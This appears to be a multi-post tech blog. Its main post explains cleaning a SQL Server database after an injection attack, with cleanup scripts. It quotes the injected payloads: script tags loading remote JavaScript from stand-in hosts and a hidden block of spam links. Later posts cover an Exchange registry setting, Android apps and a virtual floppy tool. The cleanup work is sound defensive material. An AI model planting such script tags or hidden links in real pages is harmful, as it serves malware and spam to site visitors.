Cleaning Up After a SQL Injection Attack, Part 2

Programming, Security
Posted by Jeff Knapp

Got a call today, prompted by our previous article in this series, from Branden of Hot Media Group, Inc., a Chicago-based web application development, networking, and graphic design firm. He found himself with a database full of malware injections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor were we concerned here with how the site would be hardened against a recurrence (always use stored procedures and/or parameterized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

-- xtype 35 = text, 231 = nvarchar, 167 = varchar; 99 = ntext (handled in the second loop)
-- This only PRINTs the UPDATE statements; review the output, then run it as a separate batch.
-- (REPLACE rejects text columns outright; they need the same cast the ntext loop uses.)
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- strip the single injected tag (the <script src=...> tag shown below) from each column
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],''<script src="hxxp://evilsite.evl/b.js"></script>'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- ntext cannot be passed to REPLACE, so cast to nvarchar first. Caveat: nvarchar(4000) silently
-- truncates anything longer than 4000 characters; on SQL Server 2005+ use nvarchar(max) instead.
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),''<script src="hxxp://evilsite.evl/b.js"></script>'','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly that it only stripped out a single, known bit of injected code, and our new friend had quite a bit more to deal with. Instead of the almost quaint-looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

we had this jumble of code appended to every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggested, "why don't we just drop everything to the right of the <script> tag?"
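Here is one way to carry out that idea, written as an added example rather than the code from the original post: a generalised "truncate every character column at the injected marker" script. It is built as parameterised dynamic SQL (the marker is bound through sp_executesql, not spliced into the statement). It assumes SQL Server 2005 or later (nvarchar(max), the sys.* catalog views, sp_executesql), that the injected block always begins with the literal '<script', and that no legitimate content ever follows that marker inside a cell. The @Marker and @DryRun names are this example's own.

```sql
-- Added example (not the original post's code): drop everything from the injected
-- '<script' marker onward, in every character column of every user table.
-- Assumptions: SQL Server 2005+, payload always starts with @Marker, nothing
-- legitimate follows it. Run against a restored copy first; leave @DryRun = 1
-- until the printed UPDATEs look right.
DECLARE @Marker nvarchar(50);
DECLARE @DryRun bit;
SET @Marker = N'<script';   -- start of the injected payload (assumption); must not contain LIKE wildcards (% _ [)
SET @DryRun = 1;            -- 1 = only PRINT the statements, 0 = execute them

DECLARE @Schema sysname, @Table sysname, @Col sysname, @Type sysname;
DECLARE @Obj nvarchar(300), @Sql nvarchar(max);

-- every character column in every user table, with its base type name
DECLARE Col_Cursor CURSOR LOCAL FAST_FORWARD FOR
SELECT SCHEMA_NAME(t.schema_id), t.name, c.name, TYPE_NAME(c.system_type_id)
FROM sys.tables t
JOIN sys.columns c ON c.object_id = t.object_id
WHERE TYPE_NAME(c.system_type_id) IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext');

OPEN Col_Cursor;
FETCH NEXT FROM Col_Cursor INTO @Schema, @Table, @Col, @Type;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @Obj = QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table);

    IF @Type IN ('text', 'ntext')
        -- text/ntext cannot be used with CHARINDEX or LEFT directly: go through
        -- nvarchar(max) (no 4000-character truncation) and cast back to the column type
        SET @Sql = N'UPDATE ' + @Obj + N' SET ' + QUOTENAME(@Col) +
                   N' = CAST(LEFT(CAST(' + QUOTENAME(@Col) + N' AS nvarchar(max)), ' +
                   N'CHARINDEX(@m, CAST(' + QUOTENAME(@Col) + N' AS nvarchar(max))) - 1) AS ' + @Type + N')' +
                   N' WHERE CAST(' + QUOTENAME(@Col) + N' AS nvarchar(max)) LIKE ''%'' + @m + ''%''';
    ELSE
        SET @Sql = N'UPDATE ' + @Obj + N' SET ' + QUOTENAME(@Col) +
                   N' = LEFT(' + QUOTENAME(@Col) + N', CHARINDEX(@m, ' + QUOTENAME(@Col) + N') - 1)' +
                   N' WHERE ' + QUOTENAME(@Col) + N' LIKE ''%'' + @m + ''%''';

    -- the WHERE clause guarantees CHARINDEX > 0 for every row that is updated,
    -- so LEFT(..., n) never receives a negative length
    IF @DryRun = 1
        PRINT @Sql;   -- @m appears as a parameter here; it is bound at execution time
    ELSE
        EXEC sp_executesql @Sql, N'@m nvarchar(50)', @m = @Marker;

    FETCH NEXT FROM Col_Cursor INTO @Schema, @Table, @Col, @Type;
END
CLOSE Col_Cursor;
DEALLOCATE Col_Cursor;
```

Two cautions before flipping @DryRun to 0: the script is destructive by design (anything after the marker is gone, including any legitimate text that happened to follow it), so take a backup and spot-check a few affected rows from the dry run first; and because LIKE and CHARINDEX both use the column's collation, a case-insensitive collation will also match '<SCRIPT', which is usually what you want for this kind of payload.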

Making Exchange Public Folders Store Mail Items as E-Mail

Tips
Posted by Jeff Knapp

I keep coming up against this, and I keep forgetting it, so I figured I'd write it down here for all of our benefit.

Exchange 2003 lets us easily mail-enable public folders, so mail sent to info@domain.invalid lands in a public folder that any number of staff can monitor.

However, by default the mail is stored in the public folder as a post and not as an e-mail (for the geeks in the audience: message class IPM.Post vs. IPM.Note).

To make the public folder store incoming mail as emails, we need to make a quick registry change. This is all outlined in MS KB 817809.

Go to

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSExchangeIS\<ServerName>\Public-<GUID>

and create (or edit) the value:

Value name: Incoming defaults to IPM.Note
Value type: DWORD
Value data: 1

Setting the value to 1 (true) stores incoming items as IPM.Note e-mails (which is what we want). Setting it to 0 reverts to saving them as IPM.Post posts.
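The same change scripted in PowerShell, as an added example that is not part of the original post or of the KB article. A server can carry more than one public store, each under its own Public-<GUID> key, and the placeholder above does not tell you which GUID is which; this walks all of them and sets the value only where it is not already 1. It assumes it is run with administrative rights on the Exchange server itself (so $env:COMPUTERNAME is the <ServerName> segment of the path) and that the key layout is exactly the one quoted above.

```powershell
# Added example (not from the original post or KB 817809): set
# "Incoming defaults to IPM.Note" = 1 on every public store of this server.
# Assumptions: run elevated on the Exchange server; key layout as quoted above.
$server = $env:COMPUTERNAME
$base   = "HKLM:\System\CurrentControlSet\Services\MSExchangeIS\$server"
$name   = 'Incoming defaults to IPM.Note'
$wanted = 1   # 1 = store incoming mail as IPM.Note (e-mail); 0 = back to IPM.Post

if (-not (Test-Path $base)) {
    throw "No MSExchangeIS key for server '$server' at $base"
}

Get-ChildItem -Path $base |
    Where-Object { $_.PSChildName -like 'Public-*' } |
    ForEach-Object {
        $key     = $_.PSPath
        # read the current value; $null if it has never been created
        $current = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name

        if ($current -ne $wanted) {
            Set-ItemProperty -Path $key -Name $name -Value $wanted -Type DWord
            Write-Host "$($_.PSChildName): '$name' set to $wanted (was '$current')"
        } else {
            Write-Host "$($_.PSChildName): '$name' already $wanted"
        }
    }
```

Because Set-ItemProperty is only called when the value differs, the script is safe to re-run, and the printed lines double as a record of which stores were actually changed.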

My Droid Apps…

Technology
Posted by Jeff Knapp

So, I'm not a gigantic app person -- my iPod Touch has the essentials for what I need, a few cutesy show-off things or games for the kids, so I figured I'd do the same with my Droid... yes and no. Here's a rundown of what's on my Droid right now, and what I think:

Alarmed Light - Used it because it has a feature where you're forced to answer math questions to turn the alarm off. Kinda forces you to shake the cobwebs out and get started.

Aloqa - Cool app that uses your GPS to let you know what's around. It's integrated with Yelp for food ratings. It has icons on its main screen for "Hot" (whatever that means), Yelp Restaurants, Coffee, last.fm, Music (showing me concerts in Denmark?!?), Playing Tonight (movies), Yelp Bars & Clubs, Real Estate, Wikipedia, ATMs, Pizza, Aloqa, Yelp Fast Food and then "Add more channels." It more or less does what it is supposed to; it's nice to look at.

BeamReader - a PDF viewer. I should uninstall since I bought "Documents to Go"

Bubble Burst Lite -- Windows Mobile Jawbreaker for the Droid.

ConnectFour - decent enough implementation. AI seems a little stupid sometimes.

Documents to Go - opens Word, Excel, PowerPoint, PDF. Does a good job at rendering PDFs.

Flashlight - turns your screen white. Doesn't seem to adjust for maximum brightness. Passable.

Flickr Droid - Droid needs a good Flickr app. This isn't it, but the best one I could find that uses the Flickr API to let me at my stuff, since a lot of my photostream is friends/family only.

FlightStats Lite - haven't had a chance to play with this. Will in January as I head to CES.

Goggles - Google's latest toy. Varies from wildly successful to "how did you not recognize the Pepsi logo?!?"

GPS Status - essentially a digital compass. Used when I was troubleshooting GPS on the phone.

Flixter Movies - quick and easy to get to where we have to go for Friday Morning Movie Club.

NYC Bus and Subway Map - not as interactive as I'd like. Literally a HiDef graphic of the map, and you can click thru to the MTA website for further details on the lines.

OpenTable - online restaurant reservations from opentable.com . Decent.

Pandora - works well over 3G, though I imagine it eats through the quota pretty quickly.

PicSay Lite - dopey photo editing thing. Makes speech balloons. Don't know why I downloaded this.

Poke a Mole - whack-a-mole for the phone. Fun game with a Giant Downside - even when phone is muted annoying background music plays. Have to go into game menu to mute it.

Remote RDP Demo - eventually I'll need to really use function keys when I Remote Desktop into a machine from my phone, but until then, the demo version does the trick.

Robo Defense FREE - I do enjoy the tower defense genre of casual gaming... so why not have it on my phone? (Hardly ever play it. Seemed like a good idea.)

Shazam - this app still amazes me. Where did they get that song database???

Stopwatch - straightforward.

Sudoku Free - seeing it in my list makes me feel smart until I play it, then I feel dumb.

The Weather Channel - it has a widget so I can glance at the home screen to see what it's going to be like... or rather I can look at the home screen and tell my wife what it's going to be like... (I had a weather widget on the Treo and missed it.)

TivoRemote - control the Tivo over WiFi. Nice, especially for text entry. The iPhone's version is better.

TRAFFIC! - A test app for me. Not in love.

Trap! - Another game, but its "draw a line" technology gets in the way of gameplay. Fun when it does what you want.

Tunes Remote - Control iTunes from the Droid. YAY! One of the big reasons I got the iPhone touch was to control the iTunes machine hooked to the outdoor speakers.

Twidroid Pro - From what I understand, the best Twitter client for the Droid. I'm happy with it. Does everything I need, but I am far from a Twitter power user, so some might find it lacking. They constantly update it, which makes it seem like they're interested developers.

US Traffic - Another traffic app that I tried before I realized Google Maps had a Traffic layer...

wpToGo - Allows me to post to WordPress from the phone... though I have not had the need to do so.

What have I missed?

Virtual Floppy Saves The Day

Tips
Posted by Jeff Knapp

A client has an oldish Dell Dimension 8400 with an Intel RAID controller that requires you to "Press F6 to add storage drivers" when trying to repair Windows. This also means that UBCD4Win (my preferred repair tool) doesn't recognize the drives either.

Happily, Dell has a set of the drivers available.

Sadly, they're part of a floppy image.

Grrr!

Enter Virtual Floppy Drive 2.1, a cool piece of shareware that can be glommed from http://chitchat.at.infoseek.co.jp/vmware/vfd.html

This works along the same lines as Microsoft's Virtual CD-ROM Control Panel for Windows XP, which mounts an ISO image and has it appear as a drive letter.

VFD does the same thing, it mounts an image file (or just creates a small chunk of RAM and treats it like a blank floppy) and you assign it a drive letter.

I loaded the application up -- it's pretty self-explanatory -- assigned it to drive B:, then launched Dell's floppy-making utility, told it to write to drive B, and bingo! I had my extracted files.

From there, it was trivial to copy them to the appropriate install media and we were off to the races.

(I finally searched for a virtual solution when the one floppy disk I could find was throwing errors. How happy are we that those things have (mostly) gone the way of the dinosaur?)

